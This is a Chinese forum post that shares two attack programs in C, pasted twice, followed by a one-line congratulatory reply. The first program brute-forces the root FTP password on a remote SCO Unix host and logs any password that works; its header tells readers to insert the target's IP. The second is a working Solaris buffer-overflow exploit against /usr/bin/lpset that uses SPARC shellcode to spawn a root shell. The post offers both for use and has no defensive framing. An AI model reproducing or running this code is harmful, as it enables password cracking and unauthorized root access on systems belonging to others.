19,612
社区成员
发帖
与我相关
我的任务
分享这是一个在Sco Unix下破解远程主机FTP密码的的程序;在Sun UNIX,一般用户下获得root权限的程序
/*
╔══这是一个在Sco Unix下破解远程主机FTP密码的的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2000.09.11 ║
╠═════════════════════════════╣
║ 2000.09.11 Sco Unix5.05下编译测试通过 ║
║ cc -o myftp_ok ftp.c -lsocket -lc -lcurses ║
║ 更改IP为要破解的远程主机IP再次编译就可以啦 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2000.09.11 ║
╚═════════════════════════════╝*/
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"
#include "arpa/inet.h"
#include "netdb.h"
#include "string.h"
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include "stdarg.h"
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffff
#endif
#define MMXL 1024
#define MYy 10
#define Mx 95
#define MYx 2
#define YIP "127.0.0.1"
char ip[16];
char ps[Mx] = "qwertyuiopasdfghjklzxcvbnm1234567890-=!@#$%^&*()_+`~QWERTYUIOPASDFGHJKLZXCVBNM";
char pswd[8];
char color[10];
int first = 1;
int colorq = 30;
int colorb = 7;
int ipjishu;
int i0 = 0, i1 = 0, i2 = 0, i3 = 0, i4 = 0, i5 = 0, i6 = 0, i7 = 0;
unsigned int connectloop = 0;
void readip(int ipjishu);
void loopthestr(void);
void wtfile(const char *filename, const char *ip, const char *user, const char *passwd);
char *pswdp(void);
int myread(int s);
int connectsock(const char *host, const char *service, const char *transport);
/*------------------------
实际过程的函数
------------------------*/
void main(void){
int s = -1, i = 0, flag = 1;
char user[7] = "USER ";
char pass[7] = "PASS ";
char r_n[3] = "\r\n";
char wtline[30];
const char *filename = "./mypasswd";
memset(&ip, '\0', 16);
memset(&pswd, '\0', 8);
memset(&color, '\0', 10);
printf("%c[2J", 27);
strncat((char *)ip, (char *)YIP, 16);
for(; flag; )
{
if(colorq > 37)
{
colorb = 7;
colorq = 30;
}
sprintf(color, "%c[%d;%dm", 27, colorq, (colorq+colorb+10));
colorq++;
colorb -= 2;
memset(&pswd, '\0', 8);
sprintf(pswd, "%s", pswdp());
memset(&wtline, '\0', 30);
strncat(wtline, user, 7);
strncat(wtline, (char *)"root", strlen("root"));
strncat(wtline, r_n, strlen(r_n));
strncat(wtline, pass, strlen(pass));
strncat(wtline, pswd, strlen(pswd));
strncat(wtline, r_n, strlen(r_n));
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");
printf(color);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 当前密码:%s", YIP, "root", pswd);
write((int)s, wtline, strlen(wtline));
i=myread(s);
if(i == 3 || i == 2)
{
continue;
}
if(i == 0)
{
write(s, wtline, strlen(wtline));
i=myread(s);
}
else if(i == 1)
{
printf("%c[2J", 27);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 密码成功:%s\r\n", YIP, "root", pswd);
wtfile(filename, ip, "root", (const char*)pswd);
flag = 0;
break;
}
else if(i == 5)
{
printf("要求输入密码!\r\n");
break;
}
else if(i == 4)
{
printf("要求输入用户名!\r\n");
break;
}
else
break;
}
}
/*------------------------
读取指定的IP列表文件(待补充)
------------------------*/
void readip(int ipjishu)
{
FILE *fp;
if((fp = fopen("ip.txt", "r")) != -1);
}
/*------------------------
将指定串写到指定文件中去
------------------------*/
void wtfile(filename, ip, user, passwd)
const char *filename, *ip, *user, *passwd;
{
FILE *fp;
if(strlen(filename) == 0)
{
printf("对不起,文件名不能为空!\r\n");
exit(0);
}
fp = fopen(filename, "a");
fprintf(fp, "ip:%s 用户名:%s 密码:%s\n", ip, user, passwd);
fclose(fp);
}
/*------------------------
读的程序
返回:
0.其它 :
1.破解成功
2.破解失败
3.要求输入用户名和密码
4.要求输入用户名
5.要求输入密码
------------------------*/
int myread(int s)
{
unsigned char lines[MMXL];
int i = 0;
memset((void *)lines, '\0', MMXL);
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");
i = read(s, &lines, MMXL);
printf("%c[24;2H", 27);
printf(" ");
printf("%c[24;2H", 27);
printf("状态消息:%s", lines);
if((strstr((char *)lines, "logged in") != NULL) || (strstr((char *)lines, "230") != NULL))
return 1;
else if((strstr((char *)lines, "331") != NULL) || (strstr((char *)lines, "220") != NULL))
{
return myread(s);
}
else if(strstr((char *)lines, "530") != NULL)
return 2;
else if(strstr((char *)lines, "Password:") != NULL)
return 5;
else if(strstr((char *)lines, "ame:") != NULL)
return 4;
else if(i == 0)
return 3;
else
return 0;
}
/*-----------------------
返回一个密码串
------------------------*/
char *pswdp(void)
{
if(first == 1)
{
first = 0;
return pswd;
}
if(i0 > Mx)
{
i0 = 0;
pswd[0] = ps[i0];
i1++;
if(i1 > Mx)
{
i0 = 0;
pswd[1] = ps[i1];
i2++;
if(i2 > Mx)
{
i2 = 0;
pswd[2] = ps[i2];
i3++;
if(i3 > Mx)
{
i3 = 0;
pswd[3] = ps[i3];
i4++;
if(i4 > Mx)
{
i4 = 0;
pswd[4] = ps[i4];
i5++;
if(i5 > Mx)
{
i5 = 0; pswd[5] = ps[i5];
i6++;
if(i6 > Mx)
{
i6 = 0;
pswd[6] = ps[i6];
i7++;
if(i7 > Mx)
{
loopthestr();
return pswdp();
}
}
}
}
}
}
}
}
else
{
pswd[0] = ps[i0++];
}
return pswd;
}
/*------------------------
循环移动字符串
------------------------*/
void loopthestr(void)
{
char tmp = ps[0];
int i,j = strlen(ps) - 1;
for(i = 0; i < j; i++)
ps[i] = ps[i+1];
ps[i] = tmp;
}
/*------------------------
连接程序
------------------------*/
int connectsock(
const char *host,
const char *service,
const char *transport
)
{
struct hostent *phe;
struct servent *pse;
struct protoent *ppe;
struct sockaddr_in sin;
int s, type;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
if(pse = getservbyname(service, transport))
sin.sin_port = pse->s_port;
else if((sin.sin_port = htons((u_short)atoi(service))) == 0)
{
printf("无法获得主机端口!\r\n");
}
if(phe = gethostbyname(host))
memcpy(&sin.sin_addr, phe->h_addr, phe->h_length);
else if((sin.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
{
printf("无法获得主机名\r\n");
}
if((ppe = getprotobyname(transport)) == 0)
{
printf("无法取得使用的协议\r\n");
}
type = (strcmp(transport,"udp") == 0)?SOCK_DGRAM:SOCK_STREAM;
s = socket(PF_INET, type, ppe->p_proto);
if((connect(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) && (connectloop < 99))
{
connectloop++;
connectsock(host, service, transport);
}
connectloop = 0;
return s;
}
/*
╔══这是一个在Sun UNIX,一般用户下获得root权限的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2001-09-21 ║
╠═════════════════════════════╣
║ Sun Unix下测试通过 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2001-10-11 ║
╚═════════════════════════════╝*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode[] =
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char jump[] =
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
static char nop[] = "\x80\x1c\x40\x11";
main(int argc, char **argv)
{
char buffer[10000], adr[4], *b;
int i;
printf("本代码属于共享,任何人不得以任何方式买卖!\n");
printf("违反者将从WWW永远消失,因为将有千万的人攻击他!\n");
printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");
*((unsigned long*)adr) = (*(unsigned long(*)())jump)() + 10088 + 400;
b = buffer;
sprintf(b, "xxx=");
b += 4;
for(i = 0; i < 2; i++)
*b++ = 0xff;
for(i = 0; i < NOPNUM - 4; i++)
*b++ = nop[i%4];
for(i = 0; i < strlen(shellcode); i++)
*b++ = shellcode[i];
for(i = 0; i < ALLIGN; i++)
*b++=0xff;
for(i = 0;i < ADRNUM; i++)
*b++ = adr[i%4];
*b = 0;
execle("/usr/bin/lpset", "lsd", "-n", "xfn", "-a", buffer, "printer", 0, 0);
}
╔══这是一个在Sco Unix下破解远程主机FTP密码的的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2000.09.11 ║
╠═════════════════════════════╣
║ 2000.09.11 Sco Unix5.05下编译测试通过 ║
║ cc -o myftp_ok ftp.c -lsocket -lc -lcurses ║
║ 更改IP为要破解的远程主机IP再次编译就可以啦 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2000.09.11 ║
╚═════════════════════════════╝*/
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"
#include "arpa/inet.h"
#include "netdb.h"
#include "string.h"
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include "stdarg.h"
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffff
#endif
#define MMXL 1024
#define MYy 10
#define Mx 95
#define MYx 2
#define YIP "127.0.0.1"
char ip[16];
char ps[Mx] = "qwertyuiopasdfghjklzxcvbnm1234567890-=!@#$%^&*()_+`~QWERTYUIOPASDFGHJKLZXCVBNM";
char pswd[8];
char color[10];
int first = 1;
int colorq = 30;
int colorb = 7;
int ipjishu;
int i0 = 0, i1 = 0, i2 = 0, i3 = 0, i4 = 0, i5 = 0, i6 = 0, i7 = 0;
unsigned int connectloop = 0;
void readip(int ipjishu);
void loopthestr(void);
void wtfile(const char *filename, const char *ip, const char *user, const char *passwd);
char *pswdp(void);
int myread(int s);
int connectsock(const char *host, const char *service, const char *transport);
/*------------------------
实际过程的函数
------------------------*/
void main(void){
int s = -1, i = 0, flag = 1;
char user[7] = "USER ";
char pass[7] = "PASS ";
char r_n[3] = "\r\n";
char wtline[30];
const char *filename = "./mypasswd";
memset(&ip, '\0', 16);
memset(&pswd, '\0', 8);
memset(&color, '\0', 10);
printf("%c[2J", 27);
strncat((char *)ip, (char *)YIP, 16);
for(; flag; )
{
if(colorq > 37)
{
colorb = 7;
colorq = 30;
}
sprintf(color, "%c[%d;%dm", 27, colorq, (colorq+colorb+10));
colorq++;
colorb -= 2;
memset(&pswd, '\0', 8);
sprintf(pswd, "%s", pswdp());
memset(&wtline, '\0', 30);
strncat(wtline, user, 7);
strncat(wtline, (char *)"root", strlen("root"));
strncat(wtline, r_n, strlen(r_n));
strncat(wtline, pass, strlen(pass));
strncat(wtline, pswd, strlen(pswd));
strncat(wtline, r_n, strlen(r_n));
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");
printf(color);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 当前密码:%s", YIP, "root", pswd);
write((int)s, wtline, strlen(wtline));
i=myread(s);
if(i == 3 || i == 2)
{
continue;
}
if(i == 0)
{
write(s, wtline, strlen(wtline));
i=myread(s);
}
else if(i == 1)
{
printf("%c[2J", 27);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 密码成功:%s\r\n", YIP, "root", pswd);
wtfile(filename, ip, "root", (const char*)pswd);
flag = 0;
break;
}
else if(i == 5)
{
printf("要求输入密码!\r\n");
break;
}
else if(i == 4)
{
printf("要求输入用户名!\r\n");
break;
}
else
break;
}
}
/*------------------------
读取指定的IP列表文件(待补充)
------------------------*/
void readip(int ipjishu)
{
FILE *fp;
if((fp = fopen("ip.txt", "r")) != -1);
}
/*------------------------
将指定串写到指定文件中去
------------------------*/
void wtfile(filename, ip, user, passwd)
const char *filename, *ip, *user, *passwd;
{
FILE *fp;
if(strlen(filename) == 0)
{
printf("对不起,文件名不能为空!\r\n");
exit(0);
}
fp = fopen(filename, "a");
fprintf(fp, "ip:%s 用户名:%s 密码:%s\n", ip, user, passwd);
fclose(fp);
}
/*------------------------
读的程序
返回:
0.其它 :
1.破解成功
2.破解失败
3.要求输入用户名和密码
4.要求输入用户名
5.要求输入密码
------------------------*/
int myread(int s)
{
unsigned char lines[MMXL];
int i = 0;
memset((void *)lines, '\0', MMXL);
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");
i = read(s, &lines, MMXL);
printf("%c[24;2H", 27);
printf(" ");
printf("%c[24;2H", 27);
printf("状态消息:%s", lines);
if((strstr((char *)lines, "logged in") != NULL) || (strstr((char *)lines, "230") != NULL))
return 1;
else if((strstr((char *)lines, "331") != NULL) || (strstr((char *)lines, "220") != NULL))
{
return myread(s);
}
else if(strstr((char *)lines, "530") != NULL)
return 2;
else if(strstr((char *)lines, "Password:") != NULL)
return 5;
else if(strstr((char *)lines, "ame:") != NULL)
return 4;
else if(i == 0)
return 3;
else
return 0;
}
/*-----------------------
返回一个密码串
------------------------*/
char *pswdp(void)
{
if(first == 1)
{
first = 0;
return pswd;
}
if(i0 > Mx)
{
i0 = 0;
pswd[0] = ps[i0];
i1++;
if(i1 > Mx)
{
i0 = 0;
pswd[1] = ps[i1];
i2++;
if(i2 > Mx)
{
i2 = 0;
pswd[2] = ps[i2];
i3++;
if(i3 > Mx)
{
i3 = 0;
pswd[3] = ps[i3];
i4++;
if(i4 > Mx)
{
i4 = 0;
pswd[4] = ps[i4];
i5++;
if(i5 > Mx)
{
i5 = 0; pswd[5] = ps[i5];
i6++;
if(i6 > Mx)
{
i6 = 0;
pswd[6] = ps[i6];
i7++;
if(i7 > Mx)
{
loopthestr();
return pswdp();
}
}
}
}
}
}
}
}
else
{
pswd[0] = ps[i0++];
}
return pswd;
}
/*------------------------
循环移动字符串
------------------------*/
void loopthestr(void)
{
char tmp = ps[0];
int i,j = strlen(ps) - 1;
for(i = 0; i < j; i++)
ps[i] = ps[i+1];
ps[i] = tmp;
}
/*------------------------
连接程序
------------------------*/
int connectsock(
const char *host,
const char *service,
const char *transport
)
{
struct hostent *phe;
struct servent *pse;
struct protoent *ppe;
struct sockaddr_in sin;
int s, type;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
if(pse = getservbyname(service, transport))
sin.sin_port = pse->s_port;
else if((sin.sin_port = htons((u_short)atoi(service))) == 0)
{
printf("无法获得主机端口!\r\n");
}
if(phe = gethostbyname(host))
memcpy(&sin.sin_addr, phe->h_addr, phe->h_length);
else if((sin.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
{
printf("无法获得主机名\r\n");
}
if((ppe = getprotobyname(transport)) == 0)
{
printf("无法取得使用的协议\r\n");
}
type = (strcmp(transport,"udp") == 0)?SOCK_DGRAM:SOCK_STREAM;
s = socket(PF_INET, type, ppe->p_proto);
if((connect(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) && (connectloop < 99))
{
connectloop++;
connectsock(host, service, transport);
}
connectloop = 0;
return s;
}
/*
╔══这是一个在Sun UNIX,一般用户下获得root权限的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2001-09-21 ║
╠═════════════════════════════╣
║ Sun Unix下测试通过 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2001-10-11 ║
╚═════════════════════════════╝*/
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
char shellcode[] =
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char jump[] =
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
static char nop[] = "\x80\x1c\x40\x11";
main(int argc, char **argv)
{
char buffer[10000], adr[4], *b;
int i;
printf("本代码属于共享,任何人不得以任何方式买卖!\n");
printf("违反者将从WWW永远消失,因为将有千万的人攻击他!\n");
printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");
*((unsigned long*)adr) = (*(unsigned long(*)())jump)() + 10088 + 400;
b = buffer;
sprintf(b, "xxx=");
b += 4;
for(i = 0; i < 2; i++)
*b++ = 0xff;
for(i = 0; i < NOPNUM - 4; i++)
*b++ = nop[i%4];
for(i = 0; i < strlen(shellcode); i++)
*b++ = shellcode[i];
for(i = 0; i < ALLIGN; i++)
*b++=0xff;
for(i = 0;i < ADRNUM; i++)
*b++ = adr[i%4];
*b = 0;
execle("/usr/bin/lpset", "lsd", "-n", "xfn", "-a", buffer, "printer", 0, 0);
}
...全文
请发表友善的回复…
发表回复
redhat7 2002-02-02
- 打赏
- 举报
呵呵,恭喜你啊
